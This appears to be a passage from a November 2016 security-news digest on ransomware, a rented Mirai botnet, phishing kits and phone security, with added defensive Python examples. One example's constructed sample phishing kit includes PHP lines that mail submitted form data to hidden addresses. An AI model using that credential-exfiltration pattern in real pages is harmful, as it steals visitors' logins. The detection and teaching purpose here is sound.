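To make the integrity-level table and the “OK to Bad” ratio concrete, here is an added Python example (not Kaspersky’s code) that maps an integrity-label SID such as S-1-16-12288 to its level name using the SECURITY_MANDATORY_*_RID values from winnt.h, classifies a constructed set of detection records into the OK (Untrusted/Low/Medium) and Bad (High/System) buckets, and, on Windows only, reads the current process token’s own integrity level through GetTokenInformation. The sample SIDs are constructed; the RID constants are the real winnt.h values (the page itself quotes only SECURITY_MANDATORY_LOW_RID).

```python
"""Integrity-level SIDs, the OK-to-Bad ratio, and the current token's level.

Added example, not Kaspersky's code. Sample SIDs below are constructed.
"""
import ctypes
import sys

# SECURITY_MANDATORY_*_RID from winnt.h; the mandatory label SID is S-1-16-<rid>.
MANDATORY_RIDS = {
    "Untrusted": 0x0000,
    "Low": 0x1000,
    "Medium": 0x2000,
    "High": 0x3000,
    "System": 0x4000,
}
INTEGRITY_SID_AUTHORITY = 16

# Constructed detection records: one integrity SID per detected process.
SAMPLE_DETECTIONS = ["S-1-16-8192", "S-1-16-12288", "S-1-16-16384", "S-1-16-4096", "S-1-16-12288"]


def level_from_rid(rid):
    """Integrity levels compare numerically, so a RID between two named levels
    (e.g. 0x2100, Medium Plus) belongs to the lower named level."""
    name = "Untrusted"
    for candidate, base in sorted(MANDATORY_RIDS.items(), key=lambda kv: kv[1]):
        if rid >= base:
            name = candidate
    return name


def level_from_sid(sid):
    """Parse 'S-1-16-12288' style strings; reject SIDs of other authorities."""
    parts = sid.split("-")
    if len(parts) != 4 or parts[:2] != ["S", "1"] or int(parts[2]) != INTEGRITY_SID_AUTHORITY:
        raise ValueError(f"not an integrity label SID: {sid}")
    return level_from_rid(int(parts[3]))


def ok_to_bad(levels):
    """'OK' = Untrusted/Low/Medium, 'Bad' = High/System, as rounded percentages."""
    total = len(levels)
    if total == 0:
        return (0.0, 0.0)
    bad = sum(1 for lv in levels if lv in ("High", "System"))
    return (round(100 * (total - bad) / total, 1), round(100 * bad / total, 1))


def ratio_for_sids(sids):
    return ok_to_bad([level_from_sid(s) for s in sids])


def current_process_integrity_rid():
    """Return the RID of this process's integrity label on Windows, None elsewhere."""
    if sys.platform != "win32":
        return None
    from ctypes import wintypes
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    advapi32.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                             wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    advapi32.GetSidSubAuthorityCount.restype = ctypes.POINTER(ctypes.c_ubyte)
    advapi32.GetSidSubAuthorityCount.argtypes = [ctypes.c_void_p]
    advapi32.GetSidSubAuthority.restype = ctypes.POINTER(wintypes.DWORD)
    advapi32.GetSidSubAuthority.argtypes = [ctypes.c_void_p, wintypes.DWORD]
    TOKEN_QUERY, TokenIntegrityLevel = 0x0008, 25
    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        size = wintypes.DWORD()
        advapi32.GetTokenInformation(token, TokenIntegrityLevel, None, 0, ctypes.byref(size))
        buf = ctypes.create_string_buffer(size.value)
        if not advapi32.GetTokenInformation(token, TokenIntegrityLevel, buf, size.value, ctypes.byref(size)):
            raise ctypes.WinError(ctypes.get_last_error())
        # TOKEN_MANDATORY_LABEL begins with a PSID; its last sub-authority is the RID.
        sid = ctypes.cast(buf, ctypes.POINTER(ctypes.c_void_p))[0]
        count = advapi32.GetSidSubAuthorityCount(sid)[0]
        return advapi32.GetSidSubAuthority(sid, count - 1)[0]
    finally:
        kernel32.CloseHandle(token)


if __name__ == "__main__":
    print("OK/Bad for sample:", ratio_for_sids(SAMPLE_DETECTIONS))
    rid = current_process_integrity_rid()
    print("this process:", "not Windows" if rid is None else level_from_rid(rid))
```

The numeric comparison in level_from_rid mirrors how the kernel treats the label: anything at or above 0x3000 is the High-or-better territory the article says malware aims for, which is exactly the “Bad” bucket.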


What’s the reason for these horrifying statistics? To be honest, I can’t say for certain just yet; a deeper study is required. Sure enough, virus writers employ different methods to elevate privileges: autoelevation and bypassing the UAC mechanism, vulnerabilities in Windows and third-party software, social engineering, etc. There is a non-zero probability that many users have UAC completely disabled, as it irritates them. However, it is obvious that malware creators encounter no problems with acquiring elevated privileges in Windows; therefore, threat protection developers need to consider this problem.

Another ransomware virus has succumbed to security experts. Data can be unlocked for free

28.11.2016 Novinky/Bezpečnost Viruses
Security experts have managed to outsmart yet another ransomware virus in the past few weeks. As a result, the malware called TeleCrypt currently poses practically no threat. The national security team CSIRT.CZ pointed this out.
“The encryption used in the TeleCrypt ransomware, which uses the Telegram service to communicate with its command and control server, has been broken,” said Pavel Bašta, security analyst with the CSIRT.CZ team, which is operated by the CZ.NIC association.

He also advised how people can tell that their machine has been infected by this particular ransomware. “This ransomware can usually be recognised by the extension of the encrypted files being changed to .Xcri. However, variants have already appeared that do not change the extension,” Bašta noted.

Experts from the security company Malwarebytes Labs managed to defeat the TeleCrypt ransomware. They also released a tool that makes it possible to unlock encrypted data without paying the ransom. It can be downloaded for free here, but it is only available in English.

Other viruses have fallen too
This is the latest of several recent successes for cyber-security defenders. Last week, for example, Kaspersky Lab researchers created a tool through which people can recover data encrypted by the CrySis ransomware.

The method of attack of the uninvited guests TeleCrypt and Crysis is exactly the same. First, the malware encrypts all the data stored on the hard drive. The attackers then demand a ransom for unlocking it, easily several thousand crowns.

Cybercriminals usually try to give the owner of the infected machine the impression that they will get their files back after paying the ransom. Even then, however, users may not get their data back.

Instead of paying the ransom, the virus has to be uninstalled from the computer. In most cases, however, recovering data that was not backed up is impossible. This no longer applies to the ransomware viruses TeslaCrypt, TeleCrypt, Crysis or, for example, Polyglot.

San Francisco’s public transit system was attacked by hackers; rides were free

28.11.2016 Novinky/Bezpečnost Hacking
Because of a hacker attack on the San Francisco transit agency, transport in the Californian city was free over the weekend. The BBC reported on Monday that the hackers demanded a ransom of 100 bitcoins (roughly 1.9 million crowns).
Computers on the attacked transit agency network were paralysed. “You have been hacked. All data is encrypted,” read the attackers’ message. Technicians therefore disconnected all ticket machines from the corporate network as a precaution.

The transit agency announced that the incident had no impact on security systems or customer data. “We are still investigating the event, so it is not appropriate to provide any further information at this time,” a spokesperson said.

The agency’s systems were already taken down on Friday, when the mass sale of discounted goods known as Black Friday took place, not only in the US. One passenger joked in an interview with CBS television that it looked as if public transit had joined the event too.

By Sunday afternoon, according to the International Business Times, the technicians had managed to get the ticket machines working again. Whether the hackers have been completely cut off from the corporate network is, however, not certain.

A university paid
The transit agency fell victim to extortion viruses known collectively as ransomware. Pirates try to smuggle these uninvited guests mainly onto ordinary home computers, but they also target corporate networks with them.

The administrators of the computer network at the University of Calgary in Canada know something about that. In the middle of this year, cybercriminals managed to infect more than a hundred of the university’s PCs with ransomware and demanded a ransom to unlock them.

They were not modest. They wanted 40 bitcoins for the decryption key, which at the exchange rate of the time was more than 480,000 crowns. The cybercriminals did not choose this virtual currency by chance. Its movement cannot be traced, so there is practically zero chance that they could be tracked down.

Given that e-mail communication was completely paralysed and that the university administrators could not get into the individual PCs where important data was stored, the university’s management decided to comply with the hackers’ demand. They paid the ransom.

Austrian foreign ministry website attacked by hackers

28.11.2016 Novinky/Bezpečnost Hacking
The Austrian foreign ministry has become the target of a hacker attack. The hackers most likely attacked from Turkey, the DPA agency reported. The head of Austrian diplomacy, Sebastian Kurz, has long been a harsh critic of Ankara.
What is DDoS

A DDoS (Distributed Denial of Service) attack always follows the same scenario. Hundreds of thousands of computers start accessing a particular server at the same moment. The server usually cannot handle such a high number of requests and crashes. To ordinary users, a website attacked in this way then appears to be unavailable.
“We will not be intimidated by such attacks. Austria will maintain its stance towards Turkey,” said Kurz, who is among the sharpest critics in the European Union of Ankara’s conduct in the migration crisis and after the failed coup in July.

This week Kurz, a member of the Austrian People’s Party (ÖVP), welcomed the decision of the European Parliament, which in a legally non-binding resolution called for a freeze on accession talks with Turkey.

The main reason for adopting the resolution was the purges that the Turkish authorities launched after the failed coup attempt. More than 110,000 people lost their jobs during them and 37,000 ended up in custody.

DDoS attack
The hacker attack on the Austrian foreign ministry took place on Friday evening. The ministry quickly disconnected its website from the network when it found that an unusual number of requests were aimed at it, the goal of which was evidently to flood and paralyse the site. It was therefore most likely a so-called DDoS attack.

A Turkish hacker group already claimed responsibility for an internet attack on Vienna airport in September.

The Austrian interior ministry is also currently checking whether Turks are behind a similar hacker attack on the central bank.

San Francisco Metro System Hacked with Ransomware; Resulting in Free Rides
28.11.2016 thehackernews

Nothing is immune to being hacked when hackers are motivated.
Hackers proved this on Friday, when more than 2,000 computer systems at San Francisco's public transit agency were apparently hacked.
San Francisco's Municipal Transportation Agency, also known as MUNI, offered free rides on November 26th after MUNI station payment systems and schedule monitors got hacked by ransomware and station screens across the city started displaying a message that reads:
"You Hacked, ALL Data Encrypted. Contact For Key( ,Enter."
According to the San Francisco Examiner, MUNI confirmed a Ransomware attack against the station fare systems, which caused them to shut down ticket kiosks and make rides free this weekend.
The message displayed by the malware is followed by an email address and an ID number, which can then be used to arrange ransom payments.
MUNI Spokesman Paul Rose said his agency was investigating the matter and "working to resolve the situation," but did not provide details as of how MUNI got hacked.
"We are currently working to resolve the situation," said Rose. "There is an ongoing investigation, and it wouldn’t be appropriate to provide additional details."
Pay $73,000 to Free Systems from Ransomware
Trains themselves were not affected by the malware attack, and the MUNI claimed that the payments were resumed on the morning of November 27th. The MUNI looks after trains, trams and buses around the city, including San Francisco's iconic cable cars.
It is not yet clear exactly who was responsible for the attack (besides a pseudonym "Andy Saolis"), but according to local media reports, the agency's computers were being held by ransomware until the MUNI paid the equivalent of more than $73,000 in Bitcoin.
Andy Saolis is a pseudonym commonly used in HDDCryptor ransom attacks, which uses commercial tools to encrypt hard drives and network shares on Windows machines using randomly generated keys and then overwrite the hard disks' MBRs to prevent systems from booting up properly.
The target machine is typically infected by accidentally opening a malicious executable in an email or download, and then the malware spreads out across the network.
The email address,, used by the anonymous criminal directs the city to a Russian email address to arrange payment and has been linked to other cyber attacks as well.
The Hacker Linked to a Previous Ransomware Strain
When reaching at the provided email, the hacker provided a statement in broken English, which read:
"We don't attention to interview and propagate news! Our software working completely automatically and we don't have targeted attack to anywhere! SFMTA network was Very Open and 2000 Server/PC infected by software! So we are waiting for contact any responsible person in SFMTA but I think they don't want deal ! so we close this email tomorrow!"
The same email address,, was linked to a ransomware strain called Mamba in September. The ransomware employs tactics similar to those demonstrated against the MUNI systems.
The hacker provided Hoodline with a list of systems the hacker claimed to have infected in Muni's network, which turned out to be 2,112 of the total 8,656 computer networks. The hacker also said that the MUNI had "one more day" to make a deal.
Not much about the hack is known; the extent of the hack and the hacker's identity remain a mystery for now, but the incident once again reminds us how vulnerable our critical infrastructure remains.

Two versions of the new Cerber 5.0 ransomware released in a few days
28.11.2016 securityaffairs

Security experts from the CheckPoint firm discovered two different variants of the new Cerber 5.0 ransomware in a few weeks.
Security experts have spotted a new variant of the dreaded Cerber ransomware, the Cerber 5.0. This is the third version of the malware released this week that is able to encrypt files on all accessible network shares.

The Cerber ransomware was first spotted in March, since then it rapidly evolved. In June, Cloud security provider Avanan spotted a number of Cerber Ransomware variants that were targeting corporate Office 365 users with spam or phishing emails leveraging on malicious file attachments.

Cerber 2.0 was spotted in August when it was offered in the criminal underground via the ransomware-as-a-service model.

Cerber 4.0 appeared in the wild in October; in the same month, experts observed it killing common database-related processes, such as those of MySQL, Oracle and Microsoft SQL servers, in order to encrypt their files.

The Cerber 4.0 appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.

The Cerber 4.0 is becoming very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.

The latest, the Cerber 5.0 variant, included a .vbs file with a VBScript that implements a communication channel between victims and crooks.

Last week experts from CheckPoint security observed a rapid sequence of versions being released in the wild. Less than 24 hours after the release of the version 4.1.6, crooks distributed the Cerber 5.0 and the 5.0.1.

“Only yesterday (November 23rd, 2016) a new version of Cerber was released (4.1.6); however no prominent changes were noticeable in it. Less than 24 hours later, Cerber released the new version, 5.0, which is described in this article.” reads the analysis published by the firm CheckPoint.

“A notable change introduced in this Cerber version is the new IP ranges used for command and control communication. Cerber uses one IP range which was also used in its last version (4.1.6), while the rest of the IP ranges are new.”

Cerber 5.0 leverages new IP ranges for command and control (C&C) communication; only one of them was also used in version 4.1.6. The malicious code multicasts messages to all IP addresses via UDP.

Cerber is currently distributed via spam e-mail campaigns and exploit kits, mostly Rig-V Exploit Kit. The malware uses randomly generated extensions for the encrypted file (4 random alphabetic letters).

Cerber informs victims which version of the ransomware encrypted their files via a ransom note dropped on the desktop.

cerber 5.0

Experts from CheckPoint security speculate that Cerber creators constantly improve their code to avoid security vendors’ counter-measures.

There is no doubt, Cerber 5.0 will have many other successors.

Hacker who exposed Steubenville Rape Faces longer Prison term than Rapists
28.11.2016 thehackernews Hacking
Remember Steubenville High School Rape Case?
In 2012, Steubenville (Ohio) high school's football team players gang-raped an unconscious teenage girl from West Virginia and took photographs of the sexual assault.
In December 2012, a member of the hacker collective Anonymous hacked into the Steubenville High School football fan website Roll Red Roll and leaked some evidence of the rape, including a video taken and shared by the crime's perpetrators in which they joked about the sexual assault.
The hack exposed information about the gang rape by two football team players — Trent Mays and Ma’lik Richmond, both 16 at the time of the crime — who were eventually convicted and sentenced in 2013 to two years and one year behind bars, respectively, but have since been released.
In 2013, the FBI raided the home of Deric Lostutter — Anonymous member, also known online as "KYAnonymous" — seized two laptops, flash drives, CDs, an external hard drive, cell phones and an Xbox, and arrested him.
Lostutter, a 29-year-old man from Winchester, pleaded guilty in federal court in Kentucky on Wednesday to one count of conspiring to break into computers without authorization in order to draw attention to the Steubenville rape case, and one count of lying to an FBI agent.
What's weird? The hacker is facing a longer prison term than the rapists.
Lostutter said he hacked into the site with just an intention to expose information about the gang rape. He said in court Wednesday, "We wanted to stand up for a girl who had no voice, and we went about it the wrong way," according to WTVQ.
However, prosecutors alleged that Lostutter participated in an online campaign against the school in late 2012 under the banner of Anonymous. They also said Lostutter used the online alias KYAnonymous to conspire online with other hacktivists in December 2012.
According to prosecutors, the goal was to intimidate and harass an individual who ran Roll Red Roll, the website dedicated to the football team. Lostutter gained unauthorized access to the target's website and leaked its owner's personal emails online.
There's no doubt that the operation against the school website helped bring the Steubenville rape case into the national spotlight. But Lostutter was questioned over his participation after the campaign got off the ground.
"Lostutter filmed a video wearing a mask and wrote a manifesto, which was both posted on the website to harass and intimidate people, and to gain publicity for Lostutter and [Noah] McHugh's online identities," said the prosecutors.
"Specifically, the messages threatened to reveal personal identifying information of Steubenville High School students, and made false claims that the administrator of the fan website was involved in child pornography and directed a 'rape crew.'"
Lostutter faces a maximum sentence of 10 years in prison and $250,000 in fines. He is scheduled to appear before the judge for sentencing on March 8, 2017. His defense did not comment on the plea agreement.
Noah McHugh, Lostutter's co-conspirator, pleaded guilty in September to hacking the Steubenville website. He is slated to be sentenced in December.

Hackers crashed San Francisco’s Municipal railway systems
28.11.2016 securityaffairs Hacking

Last week, unknown attackers hacked the computer systems of the San Francisco’s Municipal railway giving riders a free ride all day on Saturday.
Last week, hackers crashed the computer system of San Francisco’s Municipal railway; the unknown attackers took the ticket kiosks offline and gave riders a free ride all day on Saturday, until Sunday morning.

Computers at San Francisco Muni stations displayed the message “You Hacked” on Saturday.

According to a spokesperson, the San Francisco’s Muni rail system “opened the fare gates as a precaution to minimize customer impact.”

According to San Francisco’s CBS affiliate, the system had been hacked for days.

Hackers also breached the Muni’s email system and rumors say employees weren’t sure if they would get paid this week.

“Meanwhile, riders will continue to find the metro gates open, and the system is not reading their payment cards. The fare gates were still wide open Saturday at 6 p.m. at the Embarcadero Station.” reported the San Francisco’s CBS affiliate.

“Ticket kiosks were also out of service.”

San Francisco’s Municipal railway hacked

The San Francisco Municipal Transportation Agency, SFMTA, confirmed the cyber attack but stated that the incident has not affected transit service.

A spokesperson for the transit agency told KPIX 5 that it is an ongoing investigation.

“There’s no impact to the transit service, but we have opened the fare gates as a precaution to minimize customer impact,” said Muni spokesperson Paul Rose. “Because this is an ongoing investigation it would not be appropriate to provide additional details at this point.”

“I think it is terrifying,” said one rider. “I really do I think if they can start doing this you know here, we’re not safe anywhere.”

“I was like, is this part of Black Friday deal, or something?” added another.

Sources confirmed the investigation is ongoing, but at the time of writing the experts at the transit agency had no idea who was responsible for the cyber attack.

Hackers offer a huge Mirai botnet as a DDoS-for-hire service
28.11.2016 securityaffairs

The hackers Popopret and BestBuy are offering a DDoS-for-hire service leveraging a Mirai botnet composed of around 400,000 compromised devices.
We have written a lot about the Mirai botnet since the high-profile attacks against the Dyn DNS service and the OVH hosting provider. It is a dangerous threat designed to infect IoT devices, which can then be used to power massive DDoS attacks.

The Mirai botnet is becoming very popular in the criminal underground, so it is natural that crooks have started offering it as a DDoS-for-hire service to other cyber criminals.

BestBuy is known as the author of the GovRAT malware; he offered the source code of his threat, including a code-signing digital certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

Experts from the threat intelligence firm InfoArmor linked Popopret to BestBuy; the researchers pointed out that BestBuy had also started using the moniker “Popopret.”

The RAT was delivered through spear-phishing and drive-by download attacks. Its victims included government and military organizations, and data stolen from military organizations was also offered for sale on the black market.

Catalin Cimpanu from Bleeping Computer published an interesting post confirming that the two monikers Popopret and BestBuy (it is not clear whether they are the same person) are renting access to a Mirai botnet composed of more than 400,000 infected bots, the largest one offered for rent to date.

“Two hackers are renting access to a massive Mirai botnet, which they claim has more than 400,000 infected bots, ready to carry out DDoS attacks at anyone’s behest.” wrote Cimpanu.

The botnet offered by Popopret and BestBuy represents an evolution of the original Mirai botnet because it includes new features such as SSH brute-force attacks and the exploitation of zero-day vulnerabilities.

The experts at Bleeping Computer highlighted that this Mirai botnet isn’t cheap, because Popopret requires customers to rent it for a minimum period of two weeks.

“Price is determined by amount of bots (more bots more money), attack duration (longer = more money), and cooldown time (longer = discount),” Popopret told Bleeping Computer.

Customers can get a discount if they rent the Mirai botnet with a long DDoS cooldown time, which is the time between two consecutive DDoS attacks.

“DDoS botnets use cooldown times to avoid maxing out connections, filling and wasting bandwidth, but also preventing devices from pinging out and disconnecting during prolonged attack waves.” reported BleepingComputer.

Popopret provided an example of price for this Mirai Botnet, 50,000 bots with attack duration of 3600 secs (1 hour) and 5-10 minute cooldown time goes for roughly 3-4k per 2 weeks. The experts highlighted that the service is very expensive.

The botnet is controlled through a console hidden on the Tor network that could be accessed via Telnet.

The hackers Popopret and BestBuy declined to run a test in order to show real capabilities of their botnet.

You can monitor the Mirai botnet with the following tracker.

Scammers advertise backdoored phishing templates on YouTube
27.11.2016 securityaffairs

Security experts from the firm Proofpoint observed scammers exploiting YouTube to promote their backdoored phishing templates.
According to experts from the security firm Proofpoint, scammers are advertising backdoored phishing templates on YouTube, also offering “how-to” videos and manuals.

This is nothing new: cyber criminals are turning to legitimate websites to offer their products and services.

Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube; a query for “paypal scama” returns over 114,000 results.

The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.

“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.

The videos show what the templates look like and instruct potential buyers on how to steal information from victims with phishing attacks.

As an example of these malicious kits, the post shows an Amazon phishing template that replicates the legitimate login page of the popular website.

The researchers downloaded one of the kits advertised on YouTube and analyzed it, discovering that the clumsy scammer had left his Gmail address hardcoded in the template, alongside the email address used to receive the stolen credentials from the template.

The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.

“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.

The researchers noticed that many videos have been posted for months, a circumstance that suggests the lack of filtering mechanisms implemented by YouTube.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.
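The backdoor pattern described above (a PHP include of an innocent-looking file such as style.js placed just before the mail() call that ships the stolen credentials) can be hunted for statically when a kit is recovered. The following is an added example, not Proofpoint's code: a small scanner that walks a kit directory, flags includes of files whose extension is not a PHP one, lists every file that calls mail(), and collects all hard-coded email addresses so that each recipient of the phished data (the author's as well as the buyer's) can be reported. The sample kit it builds is constructed and reduced to the minimum needed to show the pattern; function names are assumptions.

```python
"""
Added example (not Proofpoint's code): static triage of a phishing-kit
source tree for the backdoor pattern described above.

Two tells from the analysis are mechanical to look for: an include of a
file whose name suggests a stylesheet or script (style.js) rather than PHP,
and e-mail addresses hard-coded next to mail() calls. The sample kit is
constructed; function names are assumptions.
"""
import os
import re
import tempfile

# include/require of a quoted path; group 3 is the included path.
INCLUDE_RE = re.compile(r"""\b(include|require)(_once)?\s*\(?\s*["']([^"']+)["']""", re.I)
MAIL_CALL_RE = re.compile(r"\bmail\s*\(", re.I)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PHP_EXTENSIONS = (".php", ".inc", ".phtml")


def scan_kit(root: str) -> dict:
    """Walk `root`; return suspicious includes, files calling mail(), and all addresses."""
    suspicious_includes, mail_calls, addresses = [], [], set()
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                src = f.read()
            for m in INCLUDE_RE.finditer(src):
                target = m.group(3)
                # PHP executes an included file whatever its extension, so a
                # .js or .css include is code hiding behind an innocent name.
                if not target.lower().endswith(PHP_EXTENSIONS):
                    suspicious_includes.append((rel, target))
            if MAIL_CALL_RE.search(src):
                mail_calls.append(rel)
            addresses.update(a.lower() for a in EMAIL_RE.findall(src))
    return {
        "suspicious_includes": suspicious_includes,
        "mail_calls": sorted(mail_calls),
        "addresses": sorted(addresses),
    }


def build_sample_kit() -> str:
    """Write a constructed kit skeleton to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="kit-")
    files = {
        # the buyer's collector: pulls in 'style.js' before mailing the buyer
        "post.php": '<?php\ninclude("style.js");\n'
                    'mail("buyer@example.net", "log", print_r($_POST, true));\n',
        # the hidden second copy for the kit author, dressed up as a script file
        "style.js": '<?php mail("author@example.org", "log", print_r($_POST, true)); ?>\n',
        "index.html": "<html><body><!-- form placeholder --></body></html>\n",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    report = scan_kit(build_sample_kit())
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a real recovered kit, scan_kit(path) reports the include chain and every address; the author's hidden copy shows up as a second mail() in a file that does not look like PHP.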

The Most Secure Smartphones – Holiday Edition
27.11.2016 securityaffairs Mobil

Unfortunately, many smartphones have never been designed with security in mind. Which are the most secure smartphones? Enjoy it!
In general, smartphones have never been designed with security in mind. The emphasis has always been on features and capabilities while security is usually relegated to the back burner. And, while no internet-connected device is 100% secure, a few smartphones stand out as the best contenders for mobile security.

Secure Smartphones

BlackBerry DTEK50
BlackBerry describes the DTEK50 smartphone as the “world’s most secure Android smartphone.” The DTEK50 includes features such as periodic application tracking, which automatically monitors the OS and apps. This feature also notifies you when your privacy could be at risk and informs you as to what actions you can take.

The DTEK50 also has the ‘Password keeper’ app, which allows you to store all your important passwords in an encrypted space that is itself protected by a single password.

View more information on Blackberry’s DTEK50’s features and specifications.

Boeing Black
Boeing Black is the fruit of a collaborative effort between Boeing and BlackBerry. Designed with government agencies in mind, Boeing Black is capable of encrypting calls. It also comes with a self-destruct feature which ensures that any attempt to break into the device sets off the auto-deletion of all data and software, making the phone inoperable.

View more information on Boeing Black’s features and specifications.

Turing Phone
The Turing Phone is made of Liquidmorphium, an amorphous alloy of zirconium, aluminium, copper, silver and nickel. According to its manufacturer, the Turing Phone is “unbreakable.” It runs Android 5.1 Lollipop, along with Turing’s own security-focused UI on top, for end-to-end encryption.

View more information on Turing Phone’s features and specifications.

Blackphone 2
Released by Silent Circle, the Blackphone 2 runs the company’s Silent OS, an operating system based on Android but with enhanced privacy features.

The Economic Times reports that the “OS offers an ‘Enterprise Spaces’ feature that creates multiple, separate virtual devices on one device. The company claims to have the ‘world’s fastest vulnerability management,’ which raises critical vulnerabilities within 72 hours of their detection or reporting.

The updates and patches come directly from Silent Circle, with no carrier delays or waiting periods. Major specifications of the Blackphone 2 include a 5.5-inch Full HD display with Gorilla Glass protection.”

View more information on Blackphone 2’s features and specifications.

Solarin
Solarin is manufactured by Israeli startup Sirin Labs and is priced at over $14,000. According to Sirin Labs, the phone features “the most advanced privacy technology, currently unavailable outside the agency world.”

It features 256-bit AES encryption which is similar to what some militaries use to secure their communications. Solarin also has a physical security switch, located on the back of the phone, which can be activated as needed.

View more information on Solarin’s features and specifications.

FreedomPop Private Phone
Utilizing the same hardware components as the Samsung Galaxy S2, this smartphone from the cellular company FreedomPop is Android-based and focused on privacy. Nicknamed the “Snowden phone,” it features 128-bit enciphering of calls and an anonymous browsing process. It can be purchased anonymously with Bitcoin.

View more information on the FreedomPop Private Phone’s features and specifications.

Sectera Edge
Definitely not a looker, Sectera Edge nonetheless is a favorite of the U.S. Department of Defense. Created by General Dynamics, it runs a significantly modified version of Windows and features a button-based keyboard and a price tag of over $3000.

View more information on the Sectera Edge’s features and specifications.

Two Popular Phones That Didn’t Make The List

According to Elcomsoft, a Russian forensics company, Apple dropped the ball on password security with its latest iPhone operating system. These professional iPhone hackers said that Apple has made cracking the logins for backups stored on a Mac or PC a lot easier.

Elcomsoft discovered that Apple was using a weaker password protection mechanism, for manual backups via iTunes, than before:

“Thanks to Apple’s mistake, Elcomsoft said it could potentially guess backup passwords 40 times faster using CPU acceleration when compared to the speedier GPU-powered cracking in iOS 9. When using the same Intel i5 CPU for cracking efforts, it was an astonishing 2500 times faster, with 6 million password guesses per second compared to just 2,400. The company thinks it has an 80 to 90 per cent chance of successfully getting the right password with its tools, which can be bought by anyone, not just the cops.

‘We discovered an alternative password verification mechanism added to iOS 10 backups. We looked into it and found out that the new mechanism skips certain security checks, allowing us to try passwords approximately 2500 times faster compared to the old mechanism used in iOS 9 and older.’”

Apple opted for a weaker hashing algorithm for local backups of iPhone files stored on PCs. “Such algorithms turn a plaintext password into a ‘hash’ — a string of numbers and letters. Password crackers attempt to guess the output, or hash, of the algorithm and match it with plaintext; so, the more complex the algorithm and the more complex the password, the harder it is to find a match.”

While there are obstacles to carrying out an attack under these circumstances, it is not outside the realm of possibilities. It simply means a hacker would have to gain access to the computer on which the iPhone files are stored. Additionally, the iPhone user would have also had to have turned on local backups instead of using iCloud. A hacker could access the linked computer either by physically extracting the data or by compromising the machine in some other manner, such as hacking it remotely.

If, however, a hacker has physical access to both phone and laptop, according to Elcomsoft, it is possible to “force a phone into creating a backup on the phone and it may be possible ‘to produce a local backup even if the phone is locked by using a pairing record extracted from a trusted computer.’”
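The Elcomsoft passage turns on one design point: the cost of checking a candidate password is what bounds a cracker's guess rate, so a verification path that skips the slow derivation hands the attacker the speed-up. Below is an added example, not Apple's or Elcomsoft's code and not a reconstruction of the iOS backup format: a correct verifier that always pays the full PBKDF2 cost, beside an anti-pattern verifier that consults a cheap unsalted check value first, and a timing helper that shows how many checks per second each one allows. The iteration counts, record layout and function names are assumptions.

```python
"""
Added example (not Apple's or Elcomsoft's code): why the cost of the
password check sets the attacker's guess rate.

A password-protected backup should store only a salt, a work factor and
the key derived from them, so that checking a candidate always costs the
full derivation. A verifier that first consults a cheap, unsalted check
value rejects a wrong candidate after one hash, so the slow derivation is
never paid for rejected guesses; that is the shape of the weakness
described in the article, not Apple's actual format. Names and
parameters are assumptions.
"""
import hashlib
import hmac
import os
import time

DEFAULT_ITERATIONS = 100_000  # assumed work factor for the example


def protect(password: str, iterations: int = DEFAULT_ITERATIONS, salt: bytes = None) -> dict:
    """Derive the key with PBKDF2-HMAC-SHA256 and return what the backup stores."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "key": key}


def verify_full(record: dict, candidate: str) -> bool:
    """Correct verifier: every candidate pays the full derivation cost."""
    key = hashlib.pbkdf2_hmac("sha256", candidate.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(key, record["key"])


def protect_with_shortcut(password: str, iterations: int = DEFAULT_ITERATIONS) -> dict:
    """Anti-pattern: also store a cheap, unsalted check value next to the key."""
    record = protect(password, iterations)
    record["quick_check"] = hashlib.sha256(password.encode()).digest()[:4]
    return record


def verify_shortcut(record: dict, candidate: str) -> bool:
    """Anti-pattern verifier: a wrong candidate is rejected after one SHA-256,
    so almost every guess skips PBKDF2 and the guess rate is bounded only by
    the speed of a plain hash."""
    if hashlib.sha256(candidate.encode()).digest()[:4] != record["quick_check"]:
        return False
    return verify_full(record, candidate)


def checks_per_second(verify, record: dict, n: int = 200) -> float:
    """Time n wrong candidates against `verify`; a higher number means the
    verifier gives a cracker more guesses on the same hardware."""
    start = time.perf_counter()
    for i in range(n):
        verify(record, f"wrong-candidate-{i}")
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    full = protect("correct horse battery", iterations=20_000)
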